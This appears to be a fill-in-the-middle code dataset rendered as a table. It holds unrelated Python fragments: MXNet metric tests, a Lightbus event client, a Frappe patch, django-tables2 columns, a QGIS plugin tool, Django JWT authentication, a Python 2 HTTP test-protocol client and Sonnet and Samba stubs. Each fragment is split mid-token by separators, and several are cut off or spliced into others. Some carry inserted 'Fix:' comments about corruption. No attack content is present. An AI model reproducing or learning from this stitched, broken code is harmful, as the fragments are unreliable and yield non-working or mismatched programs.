prefix stringlengths 0 918k | middle stringlengths 0 812k | suffix stringlengths 0 962k |
|---|---|---|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import mxnet as mx
import numpy as np
import json
def check_metric(metric, *args, **kwargs):
    """Round-trip a metric through its JSON config and verify equality.

    The metric is created, serialized via ``get_config``/``json.dumps``,
    recreated from the JSON string, and both configs are asserted equal.
    """
    original = mx.metric.create(metric, *args, **kwargs)
    serialized = json.dumps(original.get_config())
    restored = mx.metric.create(serialized)
    assert original.get_config() == restored.get_config()
def test_metrics():
    """Smoke-test config round-tripping for a selection of metric types."""
    cases = [
        (('acc',), {'axis': 0}),
        (('f1',), {}),
        (('perplexity', -1), {}),
        (('pearsonr',), {}),
        (('nll_loss',), {}),
    ]
    for args, kwargs in cases:
        check_metric(*args, **kwargs)
    # Composite metrics must round-trip as well.
    check_metric(mx.metric.create(['acc', 'f1']))
def test_nll_loss():
    """Verify NegativeLogLikelihood against a hand-computed expectation."""
    metric = mx.metric.create('nll_loss')
    pred = mx.nd.array([[0.2, 0.3, 0.5], [0.6, 0.1, 0.3]])
    label = mx.nd.array([2, 1])
    metric.update([label], [pred])
    _, loss = metric.get()
    # Mean of -log(p[label]) over both samples.
    expected_loss = -(np.log(pred[0][2].asscalar()) + np.log(pred[1][1].asscalar())) / 2
    # Compare with a tolerance: the metric accumulates in float32, so exact
    # equality with the float64 NumPy computation is not guaranteed.
    # (Also removes the dead `expected_loss = 0.0` assignment that was
    # immediately overwritten in the original.)
    assert abs(loss - expected_loss) < 1e-5
if __name__ == '__main__':
    # Allow running this test module directly under the nose test runner.
    import nose
    nose.runmodule()
|
rnalQueue
from lightbus.utilities.casting import cast_to_signature
from lightbus.utilities.deforming import deform_to_bus
from lightbus.utilities.singledispatch import singledispatchmethod
logger = logging.getLogger(__name__)
class EventClient(BaseSubClient):
def __init__(self, **kwargs):
    """Initialise event-client state on top of the shared sub-client base."""
    super().__init__(**kwargs)
    # Listener registrations made before the worker starts.
    self._event_listeners: List[Listener] = []
    # Tasks spawned to consume events; tracked so they can be cancelled.
    self._event_listener_tasks = set()
    # Guards listen() against being called after worker startup.
    self._listeners_started = False
async def fire_event(
    self, api_name, name, kwargs: dict = None, options: dict = None
) -> EventMessage:
    """Fire the event ``api_name.name`` onto the bus with the given kwargs.

    Validates that the API is locally registered, that the event exists, and
    that the kwargs exactly satisfy the event's declared parameters, then
    serialises the message and sends it via the transport producer.

    Args:
        api_name: Name of the locally-registered API that owns the event.
        name: Event name within that API.
        kwargs: Event arguments; must match the event's parameters exactly.
        options: Transport-specific send options.

    Returns:
        The EventMessage that was sent.

    Raises:
        UnknownApi: the API is not in the local registry.
        EventNotFound: the API has no event of this name.
        InvalidEventArguments: missing required or unexpected kwargs.
    """
    kwargs = kwargs or {}
    try:
        api = self.api_registry.get(api_name)
    except UnknownApi:
        # Re-raise with a fuller explanation: firing is only allowed for APIs
        # this process is authoritative for.
        raise UnknownApi(
            "Lightbus tried to fire the event {api_name}.{name}, but no API named {api_name}"
            " was found in the registry. An API being in the registry implies you are an"
            " authority on that API. Therefore, Lightbus requires the API to be in the registry"
            " as it is a bad idea to fire events on behalf of remote APIs. However, this could"
            " also be caused by a typo in the API name or event name, or be because the API"
            " class has not been registered using bus.client.register_api(). ".format(
                **locals()
            )
        )
    validate_event_or_rpc_name(api_name, "event", name)
    try:
        event = api.get_event(name)
    except EventNotFound:
        raise EventNotFound(
            "Lightbus tried to fire the event {api_name}.{name}, but the API {api_name} does"
            " not seem to contain an event named {name}. You may need to define the event, you"
            " may also be using the incorrect API. Also check for typos.".format(**locals())
        )
    p: Parameter
    # Parameters may be plain strings or Parameter objects; normalise to names.
    parameter_names = {p.name if isinstance(p, Parameter) else p for p in event.parameters}
    # Plain-string parameters have no is_required attribute and are treated as
    # required (getattr default True).
    required_parameter_names = {
        p.name if isinstance(p, Parameter) else p
        for p in event.parameters
        if getattr(p, "is_required", True)
    }
    if required_parameter_names and not required_parameter_names.issubset(set(kwargs.keys())):
        raise InvalidEventArguments(
            "Missing required arguments when firing event {}.{}. Attempted to fire event with "
            "{} arguments: {}. Event requires {}: {}".format(
                api_name,
                name,
                len(kwargs),
                sorted(kwargs.keys()),
                len(parameter_names),
                sorted(parameter_names),
            )
        )
    # Arguments that are not declared on the event at all are rejected too.
    extra_arguments = set(kwargs.keys()) - parameter_names
    if extra_arguments:
        raise InvalidEventArguments(
            "Unexpected argument supplied when firing event {}.{}. Attempted to fire event with"
            " {} arguments: {}. Unexpected argument(s): {}".format(
                api_name, name, len(kwargs), sorted(kwargs.keys()), sorted(extra_arguments),
            )
        )
    # Convert values into bus-serialisable form before building the message.
    kwargs = deform_to_bus(kwargs)
    event_message = EventMessage(
        api_name=api.meta.name, event_name=name, kwargs=kwargs, version=api.meta.version
    )
    # Schema validation of the outgoing message, then user hooks around send.
    validate_outgoing(self.config, self.schema, event_message)
    await self.hook_registry.execute("before_event_sent", event_message=event_message)
    logger.info(L("📤 Sending event {}.{}".format(Bold(api_name), Bold(name))))
    await self.producer.send(SendEventCommand(message=event_message, options=options)).wait()
    await self.hook_registry.execute("after_event_sent", event_message=event_message)
    return event_message
def listen(
    self,
    events: List[Tuple[str, str]],
    listener: Callable,
    listener_name: str,
    options: dict = None,
    on_error: OnError = OnError.SHUTDOWN,
):
    """Register ``listener`` for the given ``(api_name, event_name)`` pairs.

    Must be called before the worker starts (e.g. in an on_start hook).
    Listener names must be unique per API.

    Args:
        events: List of (api_name, event_name) tuples to listen on.
        listener: Callable invoked for each received event.
        listener_name: Unique name for this listener (per API).
        options: Transport-specific consume options.
        on_error: Whether an exception in the listener shuts the worker
            down or is acknowledged and logged.

    Raises:
        ListenersAlreadyStarted: called after worker startup.
        DuplicateListenerName: another listener with this name exists
            for one of the referenced APIs.
    """
    if self._listeners_started:
        # We are actually technically able to support starting listeners after worker
        # startup, but it seems like it is a bad idea and a bit of an edge case.
        # We may revisit this if sufficient demand arises.
        raise ListenersAlreadyStarted(
            "You are trying to register a new listener after the worker has started running."
            " Listeners should be setup in your @bus.client.on_start() hook, in your bus.py"
            " file."
        )
    # Sanity check the listener callable itself (signature etc.).
    sanity_check_listener(listener)
    # Reject duplicate listener names on a per-API basis.
    for listener_api_name, _ in events:
        duplicate_listener = self.get_event_listener(listener_api_name, listener_name)
        if duplicate_listener:
            raise DuplicateListenerName(
                f"A listener with name '{listener_name}' is already registered for API"
                f" '{listener_api_name}'. You cannot have multiple listeners with the same name"
                " for a given API. Rename one of your listeners to resolve this problem."
            )
    # Validate every event name before registering anything.
    for api_name, name in events:
        validate_event_or_rpc_name(api_name, "event", name)
    self._event_listeners.append(
        Listener(
            callable=listener,
            options=options or {},
            events=events,
            name=listener_name,
            on_error=on_error,
        )
    )
def get_event_listener(self, api_name: str, listener_name: str):
    """Return the registered listener with this name on this API, or None."""
    matches = (
        registered
        for registered in self._event_listeners
        if registered.name == listener_name
        and any(api == api_name for api, _ in registered.events)
    )
    return next(matches, None)
async def _on_message(
self, event_message: EventMessage, listener: Callable, options: dict, on_error: OnError
):
# TODO: Check events match those requested
logger.info(
L(
"📩 Received event {}.{} with ID {}".format(
Bold(event_message.api_name), Bold(event_message.event_name), event_message.id
)
)
)
validate_incoming(self.config, self.schema, event_message)
await self.hook_registry.execute("before_event_execution", event_message=event_message)
if self.config.api(event_message.api_name).cast_values:
parameters = cast_to_signature(parameters=event_message.kwargs, callable=listener)
else:
parameters = event_message.kwargs
# Call the listener.
# Pass the event message as a positional argument,
# thereby allowing listeners to have flexibility in the argument names.
# (And therefore allowing listeners to use the `event` parameter themselves)
if on_error == OnError.SHUTDOWN:
# Run the callback in the queue_exception_checker(). This will
# put any errors into Lightbus' error queue, and therefore
# cause a shutdown
await queue_exception_checker(
run_user_provided_callable(listener, args=[event_message], kwargs=parameters),
self.error_queue,
help=(
f"An error occurred while {listener} was handling an event. Lightbus will now"
" shutdown. If you wish to continue you can use the on_error parameter when"
" setting up your event. For example:\n\n bus.my_api.my_event.listen(fn,"
| " listener_name='example', on_error=lightbus.OnError.ACKNOWLEDGE_AND_LOG)"
),
)
elif on_error == on_error.ACKNOWLEDGE_AND_LOG:
try:
await listener(event_message, **parameters)
except asyncio.CancelledError:
raise
except Exception as e:
# Log here. Acknowledgement will follow in below
logger.exception(e)
# A | cknowledge the successfully processed message
await self.producer.send(
AcknowledgeEve |
def extractShibbsdenCom(item):
    '''
    Parser for 'shibbsden.com'

    Returns a release message for known series tags, None for items with no
    chapter/volume info or previews, and False when no tag matches.
    '''
    # Fix: stray dataset-separator characters (' | ') corrupted the tagmap
    # tuple and the buildReleaseMessageWithType call; restored valid syntax.
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol) or "preview" in item['title'].lower():
        return None

    # Map feed tags to canonical series names and translation type.
    tagmap = [
        ('GOOD CHILD', 'Reborn as a Good Child', 'translated'),
        ('LUCKY CAT', 'I am the Lucky Cat of an MMORPG', 'translated'),
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    ]
    for tagname, name, tl_type in tagmap:
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
from __future__ import unicode_literals
import frappe
def execute():
    """Patch: recompute Project.total_sales_amount from submitted Sales Orders.

    Fix: stray dataset-separator characters corrupted the "projects" string
    literal and the SQL keyword `from`; restored valid code.
    """
    frappe.reload_doc("projects", "doctype", "project")
    # docstatus=1 restricts the sum to submitted (non-draft, non-cancelled)
    # Sales Orders; projects without orders get 0 via ifnull.
    frappe.db.sql("""
        update `tabProject` p
        set total_sales_amount = ifnull((select sum(base_grand_total)
            from `tabSales Order` where project=p.name and docstatus=1), 0)
    """)
import logging
from django.utils.html import format_html
import django_tables2 as tables
from django_tables2.rows import BoundPinnedRow, BoundRow
logger = logging.getLogger(__name__)
# A cheat to force BoundPinnedRows to use the same rendering as BoundRows
# otherwise links don't work
# BoundPinnedRow._get_and_render_with = BoundRow._get_and_render_with
class MultiLinkColumn(tables.RelatedLinkColumn):
    """
    Like RelatedLinkColumn but allows multiple choices of accessor to be
    rendered in a hierarchy, e.g.
        accessors = ['foo.bar', 'baz.bof']
        text = '{instance.number}: {instance}'
    In this case if 'foo.bar' resolves, it will be rendered. Otherwise
    'baz.bof' will be tested to resolve, and so on. If nothing renders,
    the column will be blank. The text string will resolve using instance.
    """

    def __init__(self, accessors, **kwargs):
        """Here we force order by the accessors. By default MultiLinkColumns
        have empty_values: () to force calculation every time.
        """
        defaults = {
            'order_by': accessors,
            'empty_values': (),
        }
        defaults.update(**kwargs)
        super().__init__(**defaults)
        self.accessors = [tables.A(a) for a in accessors]

    def compose_url(self, record, bound_column):
        """Resolve the first accessor which resolves. """
        for a in self.accessors:
            try:
                return a.resolve(record).get_absolute_url()
            except (ValueError, AttributeError):
                continue
        return ""

    def text_value(self, record, value):
        """If self.text is set, it will be used as a format string for the
        instance returned by the accessor with the keyword `instance`.
        """
        for a in self.accessors:
            try:
                instance = a.resolve(record)
                if instance is None:
                    raise ValueError
            # Fix: also swallow AttributeError, consistent with compose_url —
            # previously a broken accessor degraded gracefully in the URL but
            # crashed the text rendering.
            except (ValueError, AttributeError):
                continue
            # Use self.text as a format string
            if self.text:
                return self.text.format(instance=instance, record=record,
                                        value=value)
            else:
                return str(instance)
        # Finally if no accessors were resolved, return value or a blank string
        return value or ""
class XeroLinkColumn(tables.Column):
    """Renders a badge link to the object's record in Xero."""

    def render(self, value, record=None):
        # Records never synced to Xero have no xero_id; render nothing.
        if not record.xero_id:
            return
        return format_html(
            '<span class="badge progress-bar-info">'
            '<a class="alert-link" role="button" target="_blank" '
            'href="{href}">View in Xero</a></span>',
            href=record.get_xero_url()
        )
class BaseTable(tables.Table):
    """Base table applying the project's standard Bootstrap styling.

    Fix: removed a stray dataset-separator character that corrupted the
    Meta.attrs line, and deleted the commented-out classmethod duplicate of
    set_header_color (dead code shadowing the live implementation below).
    """

    class Meta:
        attrs = {"class": "table table-bordered table-striped table-hover "
                          "table-condensed"}

    def set_header_color(self, color):
        """
        Sets all column headers to have this background colour.
        """
        for column in self.columns.columns.values():
            try:
                # Merge into existing <th> attrs if present...
                column.column.attrs['th'].update(
                    {'style': f'background-color:{color};'})
            except KeyError:
                # ...otherwise create the <th> attrs dict from scratch.
                column.column.attrs['th'] = {
                    'style': f'background-color:{color};'}
class ModelTable(BaseTable):
    # Model-backed tables: hide the primary-key column by default.
    class Meta(BaseTable.Meta):
        exclude = ('id',)
class CurrencyColumn(tables.Column):
    """Render a table column as GBP."""

    def render(self, value):
        # Thousands separator, two decimal places, pound-sign prefix.
        return '£' + format(value, ',.2f')
class NumberColumn(tables.Column):
    """Only render decimal places if necessary."""

    def render(self, value):
        # None renders blank (implicit None return), matching table defaults.
        if value is None:
            return
        # Locale-aware 'n' formatting drops unnecessary decimals for ints.
        return f'{value:n}'
class ColorColumn(tables.Column):
    """Render the colour in a box."""

    def __init__(self, *args, **kwargs):
        """This will ignore other attrs passed in."""
        if 'attrs' not in kwargs:
            kwargs['attrs'] = {'td': {'class': "small-width text-center"}}
        super().__init__(*args, **kwargs)

    def render(self, value):
        # Falsy values (None, '') render blank.
        if not value:
            return
        return format_html(
            '<div class="color-box" style="background:{};"></div>', value)
|
***********************************************************
QAD Quantum Aided Design plugin ok
classe per gestire il map tool in ambito del comando array
-------------------
begin : 2016-05-31
copyright : iiiii
email : hhhhh
developers : bbbbb aaaaa ggggg
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
 *   the Free Software Foundation; either version 2 of the License, or     *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from .. import qad_utils
from ..qad_variables import QadVariables
from ..qad_getpoint import QadGetPoint, QadGetPointSelectionModeEnum, QadGetPointDrawModeEnum
from ..qad_highlight import QadHighlight
from ..qad_dim import QadDimStyles, appendDimEntityIfNotExisting
from ..qad_entity import QadCacheEntitySetIterator, QadEntityTypeEnum
from .. import qad_array_fun
#===============================================================================
# Qad_array_maptool_ModeEnum class.
#===============================================================================
class Qad_array_maptool_ModeEnum():
    """Input modes for the ARRAY command map tool."""
    # nothing is requested
    NONE = 0
    # the base point is requested
    ASK_FOR_BASE_PT = 1
    # the first point for the distance between columns is requested
    ASK_FOR_COLUMN_SPACE_FIRST_PT = 2
    # the first point for the cell size is requested
    ASK_FOR_1PT_CELL = 3
    # the second point for the cell size is requested
    ASK_FOR_2PT_CELL = 4
    # the first point for the distance between rows is requested
    ASK_FOR_ROW_SPACE_FIRST_PT = 5
#===============================================================================
# Qad_array_maptool class
#===============================================================================
class Qad_array_maptool(QadGetPoint):
def __init__(self, plugIn):
    """Map tool collecting interactive input for the ARRAY command."""
    QadGetPoint.__init__(self, plugIn)
    self.cacheEntitySet = None   # entities being arrayed
    self.basePt = None           # base point of the array
    self.arrayType = None
    self.distanceBetweenRows = None
    self.distanceBetweenCols = None
    self.itemsRotation = None
    # rectangular array
    self.rectangleAngle = None
    self.rectangleCols = None
    self.rectangleRows = None
    self.firstPt = None
    # path array
    self.pathTangentDirection = None
    self.pathRows = None
    self.pathItemsNumber = None
    self.pathPolyline = None
    # polar array
    self.centerPt = None
    self.polarItemsNumber = None
    self.polarAngleBetween = None
    self.polarRows = None
    # rubber-band style preview of the resulting array
    self.__highlight = QadHighlight(self.canvas)
def hidePointMapToolMarkers(self):
    """Hide the point map tool markers together with the preview highlight."""
    QadGetPoint.hidePointMapToolMarkers(self)
    self.__highlight.hide()
def showPointMapToolMarkers(self):
    """Show the point map tool markers together with the preview highlight."""
    QadGetPoint.showPointMapToolMarkers(self)
    self.__highlight.show()
def clear(self):
    """Reset tool state, clearing the preview highlight and the input mode."""
    QadGetPoint.clear(self)
    self.__highlight.reset()
    self.mode = None
#============================================================================
# doRectangleArray
#============================================================================
def doRectangleArray(self):
    """Preview a rectangular array of the cached entities in the highlight layer."""
    self.__highlight.reset()
    dimElaboratedList = [] # list of the dimension entities already processed
    entityIterator = QadCacheEntitySetIterator(self.cacheEntitySet)
    for entity in entityIterator:
        qadGeom = entity.getQadGeom().copy() # this initialises the qad info
        # check whether the entity belongs to a dimension style
        dimEntity = QadDimStyles.getDimEntity(entity)
        if dimEntity is not None:
            if appendDimEntityIfNotExisting(dimElaboratedList, dimEntity) == False: # dimension already processed
                continue
            entity = dimEntity
        # stop the preview as soon as one entity fails to be arrayed
        if qad_array_fun.arrayRectangleEntity(self.plugIn, entity, self.basePt, self.rectangleRows, self.rectangleCols, \
                self.distanceBetweenRows, self.distanceBetweenCols, self.rectangleAngle, self.itemsRotation,
                False, self.__highlight) == False:
            return
#============================================================================
# doPathArray
#============================================================================
def doPathArray(self):
    """Preview a path array of the cached entities in the highlight layer."""
    self.__highlight.reset()
    dimElaboratedList = [] # list of the dimension entities already processed
    entityIterator = QadCacheEntitySetIterator(self.cacheEntitySet)
    for entity in entityIterator:
        qadGeom = entity.getQadGeom().copy() # this initialises the qad info
        # check whether the entity belongs to a dimension style
        dimEntity = QadDimStyles.getDimEntity(entity)
        if dimEntity is not None:
            if appendDimEntityIfNotExisting(dimElaboratedList, dimEntity) == False: # dimension already processed
                continue
            entity = dimEntity
        # NOTE(review): self.distanceFromStartPt is not initialised in
        # __init__ — presumably assigned by the ARRAY command class before
        # this preview runs; confirm against the caller.
        if qad_array_fun.arrayPathEntity(self.plugIn, entity, self.basePt, self.pathRows, self.pathItemsNumber, \
                self.distanceBetweenRows, self.distanceBetweenCols, self.pathTangentDirection, self.itemsRotation, \
                self.pathPolyline, self.distanceFromStartPt, \
                False, self.__highlight) == False:
            return
#============================================================================
# doPolarArray
#============================================================================
def doPolarArray(self):
    """Preview a polar array of the cached entities in the highlight layer."""
    self.__highlight.reset()
    dimElaboratedList = [] # list of the dimension entities already processed
    entityIterator = QadCacheEntitySetIterator(self.cacheEntitySet)
    for entity in entityIterator:
        qadGeom = entity.getQadGeom().copy() # this initialises the qad info
        # check whether the entity belongs to a dimension style
        dimEntity = QadDimStyles.getDimEntity(entity)
        if dimEntity is not None:
            if appendDimEntityIfNotExisting(dimElaboratedList, dimEntity) == False: # dimension already processed
                continue
            entity = dimEntity
        # stop the preview as soon as one entity fails to be arrayed
        if qad_array_fun.arrayPolarEntity(self.plugIn, entity, self.basePt, self.centerPt, self.polarItemsNumber, \
                self.polarAngleBetween, self.polarRows, self.distanceBetweenRows, self.itemsRotation, \
                False, self.__highlight) == False:
            return
def canvasMoveEvent(self, event):
    """Delegate mouse-move handling to the base point-acquisition tool."""
    QadGetPoint.canvasMoveEvent(self, event)
    # # once the base point is known, the second point is requested
    # if self.mode == Qad_array_maptool_ModeEnum.BASE_PT_KNOWN_ASK_FOR_COPY_PT:
    #    self.setCopiedGeometries(self.tmpPoint)
def activate(self):
    """Activate the map tool and show the preview highlight."""
    QadGetPoint.activate(self)
    self.__highlight.show()
def deactivate(self):
try: # necessario perché se si chiude QGIS parte questo evento nonostante non ci sia più l'oggetto maptool !
QadGetPoint.deactivate(self)
self.__highlight.hide()
except:
pass
def setMode(self, mode):
self.mode = mode
# non si richiede niente
if self.mode == Qad_array_maptool_ModeEnum.NONE:
self.setSelectionMode(QadGetPoint |
from django.conf import settings
from django.utils import timezone
from rest_framework import authentication
from rest_framework import exceptions
import datetime
import jwt
from .models import User
def generate_jwt(user):
    """Return a signed JWT for *user*, valid for two weeks.

    Claims: ``user`` (primary key), ``exp`` (expiry), ``iat`` (issued-at).
    """
    # Read the clock once so exp is exactly iat + 2 weeks; the original read
    # it twice, letting the two claims drift apart by microseconds.
    now = timezone.now()
    payload = {
        'user': user.pk,
        'exp': now + datetime.timedelta(weeks=2),
        'iat': now
    }
    return jwt.encode(payload, settings.SECRET_KEY)
def decode_jwt(token):
    """Decode and verify *token* against the project secret.

    Fix: a stray dataset-separator character had corrupted the parameter
    name (``tok | en``); restored valid syntax.
    Raises the jwt.* exceptions handled by JWTAuthentication on failure.
    """
    return jwt.decode(token, settings.SECRET_KEY)
class JWTAuthentication(authentication.BaseAuthentication):
    """DRF authentication backend validating a JWT from the Authorization header.

    Fix: a stray dataset-separator character had corrupted one
    ``exceptions.AuthenticationFailed`` reference; restored valid syntax.
    """

    def authenticate(self, request):
        """Return ``(user, token)`` on success; raise AuthenticationFailed otherwise."""
        token = self._get_jwt_from_header(request)
        try:
            payload = decode_jwt(token)
        except jwt.ExpiredSignature:
            detail = 'Signature has expired.'
            raise exceptions.AuthenticationFailed(detail=detail)
        except jwt.DecodeError:
            detail = 'Error decoding token.'
            raise exceptions.AuthenticationFailed(detail=detail)
        except jwt.InvalidTokenError:
            # Catch-all for any other token problem; no detail leaked.
            raise exceptions.AuthenticationFailed()
        user = self._get_user_by_id(payload)
        return (user, token)

    def _get_jwt_from_header(self, request):
        """Extract the raw token from the ``Authorization: <prefix> <token>`` header."""
        auth_header = authentication.get_authorization_header(request)
        if not auth_header:
            detail = 'No Authorization header present.'
            raise exceptions.AuthenticationFailed(detail=detail)
        try:
            prefix, token = auth_header.split()
        except ValueError:
            # Header did not split into exactly two whitespace-separated parts.
            detail = 'Invalid Authorization header.'
            raise exceptions.AuthenticationFailed(detail=detail)
        return token

    def _get_user_by_id(self, payload):
        """Look up the user referenced by the token payload's ``user`` claim."""
        user_pk = payload['user']
        try:
            return User.objects.get(pk=user_pk)
        except User.DoesNotExist:
            detail = 'Invalid payload.'
            raise exceptions.AuthenticationFailed(detail=detail)
|
rson obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import httplib
import urllib
import socket
class ToolProtocolHTTP(object):
"""
HTTP/HTTPS client for TEMA MBT protocol. Discusses with the TEMA test engine.
"""
# is client connected to the server
isConnected = False
def __init__(self):
self.host = "localhost"
self.port = 80
self.php_file = "temagui_http_proxy.php"
socket.setdefaulttimeout(1800)
def __del__(self):
if self.isConnected:
http_params = urllib.urlencode({"User" : self.username, "Message" : 'CLOSE', "Parameter" : 'Empty'})
http_data = self.__requestreply(http_params)
def __requestreply(self,message ):
""" One http(s) request/reply.
Message: Message to send string.
Returns: Reply string.
"""
http_data = ''
try:
http_connection = None
if self.protocol == "HTTP":
http_connection = httplib.HTTPConnection(self.host, self.port)
elif self.protocol == "HTTPS":
http_connection = httplib.HTTPSConnection(self.host, self.port)
else:
return ''
http_connection.connect()
http_connection.request("POST", self.php_file, message , self.http_headers)
http_response = http_connection.getresponse()
http_data = http_response.read()
http_response.close()
http_connection.close()
except Exception, e:
http_data = ''
return http_data
def init(self, host, path, port, username, protocol):
""" Initialises connection. Sends HELO.
host: Server hostname.
path: path to http proxy in server.
port: port
username: wwwgui username
protocol: http/https
returns: Reply to ACK. On error returns ''
"""
self.http_headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
self.host = host
self.php_file = "/".join(["",path,"temagui_http_proxy.php"])
self.port = port
self.username = username
self.protocol = protocol.upper()
try:
# SEND HELO
http_params = urllib.urlencode({"User" : username, "Message" : 'HELO', "Parameter" : 'Empty'})
http_data = self.__requestreply(http_params)
self.isConnected = True
lines = http_data.splitlines()
if lines != []:
message = lines.pop()
if message == "CLOSE":
http_data = ''
self.isConnected = False
except Exception, e:
self.isConnected = False
return ''
return http_data
def getKeyword(self):
""" Gets keyword from testserver.
Sends GET to te | stserver and waits for reply.
Returns: Reply to GET. On error return ''
"""
http_data = ''
try:
http_params = urllib.urlencode({"User" : self.username, "Message" : 'GET', "Parameter" : 'Empty'})
http_data = self.__requestreply(http_params)
lines = http_data.splitlines()
if lines != []:
message | = lines.pop()
if message == "CLOSE":
self.isConnected = False
return 'ERROR'
if message == 'ERR':
# TODO: don't send ack.
http_data = self.__requestreply(http_params)
http_params = urllib.urlencode({"User" : self.username, "Message" : 'ACK', "Parameter" : 'Empty'})
http_data = self.__requestreply(http_params)
self.isConnected = False
return 'ERROR'
if not http_data.startswith("ACK"):
print http_data
return "ERROR"
else:
#http_data = http_data.partition("ACK")[2].strip()
http_data = http_data.split("ACK")[1].strip()
if http_data == '' or http_data == None:
http_data = ''
self.isConnected = False
except Exception, e:
self.isConnected = False
return http_data
def putResult(self, result):
""" Puts result to testserver.
result: True/False
returns: Reply message to PUT
"""
try:
if result:
http_params = urllib.urlencode({"User" : self.username, "Message" : 'PUT', "Parameter" : 'true'})
else:
http_params = urllib.urlencode({"User" : self.username, "Message" : 'PUT', "Parameter" : 'false'})
except Exception, e:
self.isConnected = False
return ''
try:
http_data = self.__requestreply(http_params)
lines = http_data.splitlines()
if lines != []:
message = lines.pop()
if message == "CLOSE":
self.isConnected = False
return ''
if http_data == '':
self.isConnected = False
except Exception, e:
self.isConnected = False
http_data = ''
return http_data
def log(self, msg):
""" Sends log message to testserver
returns: Reply to message.
"""
http_data = ''
try:
http_params = urllib.urlencode({"User" : self.username, "Message" : 'LOG', "Parameter" : msg })
http_data = self.__requestreply(http_params)
lines = http_data.splitlines()
if lines != []:
message = lines.pop()
if message == "CLOSE":
self.isConnected = False
return ''
if http_data == '':
self.isConnected = False
except Exception, e:
self.isConnected = False
http_data = ''
return http_data
def bye(self):
""" Sends message BYE to testserver. """
http_data = ''
try:
http_params = urllib.urlencode({"User" : self.username, "Message" : 'BYE', "Parameter" : 'None'})
http_data = self.__requestreply(http_params)
self.isConnected = False
except Exception, e:
self.isConnected = False
return ''
def hasConnection(self):
return self.isConnected
if __name__ == "__main__":
c = ToolProtocol()
print "init -> " + c.init()
print "getKeyword -> " + c.getKeyword()
print "putResult |
# encoding: utf-8
# module samba.dcerpc.drsuapi
# from /usr/lib/python2.7/dist-packages/samba/dcerpc/drsuapi.so
# by generator 1.135
""" drsuapi DCE/RPC """
# imports
import dcerpc as __dcerpc
import talloc as __talloc
class DsReplicaObjMetaData2Ctr(__talloc.Object):
    # Generated binding stub; real implementations live in the C extension.
    # Fix: stray dataset-separator characters had corrupted the class name
    # and a comment; restored valid syntax.
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass
    array = property(lambda self: object(), lambda self, v: None, lambda self: None)  # default
    count = property(lambda self: object(), lambda self, v: None, lambda self: None)  # default
    enumeration_context = property(lambda self: object(), lambda self, v: None, lambda self: None)  # default
|
'd'
def x():
print j
j = 0
def y():
| for x in []:
print | x
|
# Copyright 2019 The Sonnet Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""TensorFlow op that scales gradient for backwards pass."""
from typing import Tuple
from sonnet.src import types
import tensorflow as tf
@tf.custom_gradient
def scale_gradient(
    t: tf.Tensor, scale: types.FloatLike
) -> Tuple[tf.Tensor, types.GradFn]:
  """Scales gradients for the backwards pass.

  Fix: stray dataset-separator characters had corrupted the `FloatLike`
  annotation and the docstring; restored valid syntax.

  Args:
    t: A Tensor.
    scale: The scale factor for the gradient on the backwards pass.

  Returns:
    A Tensor same as input, with scaled backward gradient.
  """

  def grad(dy: tf.Tensor) -> Tuple[tf.Tensor, None]:
    """Scaled gradient."""
    # None: no gradient flows to the `scale` argument itself.
    return scale * dy, None

  return t, grad
|
##
## This copyrighted software is distributed under the GPL v2.0 license.
## See the LICENSE file for more details.
##
## Yeast workspace configuration file
import numpy as np
import WorkspaceModules.YeastApplicatorPlate
import WorkspaceModules.YeastArena
import WorkspaceModules.YeastArena3x3
# Workspace definition: base plate thickness (mm) plus positioned modules.
# Fix: stray dataset-separator characters had corrupted the module path and
# the dict continuation line; restored valid syntax.
YeastWorkspace = {
    'baseThickness': 2.93,
    'yeastApplicatorPlate': WorkspaceModules.YeastApplicatorPlate.YeastApplicatorPlate(422.0, 247),
    'yeastArena': WorkspaceModules.YeastArena.YeastArena(285, 139),
    'yeastArena3x3': WorkspaceModules.YeastArena3x3.YeastArena3x3(124, 36),
}
|
d running?")
log.critical("Login failed - Could not create session. Is memcached running?")
